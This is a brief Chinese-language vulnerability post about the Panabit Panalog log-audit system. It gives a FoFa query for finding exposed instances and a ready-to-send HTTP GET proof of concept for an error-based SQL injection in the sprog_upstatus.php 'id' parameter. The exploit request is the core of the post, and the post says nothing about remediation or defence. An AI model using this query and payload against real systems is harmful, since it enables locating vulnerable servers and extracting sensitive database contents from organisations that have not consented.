FoFa语句:
product="Panabit-Panalog"
Panalog 是一个全面的日志审计系统,可以帮助组织实时监控和分析各种类型的系统和应用程序日志。它提供了强大的日志搜索、分析和报告功能,可以快速发现异常情况和潜在的安全威胁。Panalog 支持多种日志来源,如 Windows 事件日志、Linux 系统日志、网络设备日志等,并提供直观的仪表盘和可视化工具,帮助用户更好地理解和解释日志数据。该系统还具有合规性报告功能,可以根据行业标准自动生成相关报告,助力组织满足各种法规要求。总的来说,Panalog 是一个集中式、智能化的日志审计解决方案,可以大幅提高组织的安全性和合规性。其接口sprog_upstatus存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
POC:
GET /Maintain/sprog_upstatus.php?status=1&rdb=1&id=1%20and%20updatexml(1,concat(0x7e,md5(123456),0x7e),1) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
没有回复内容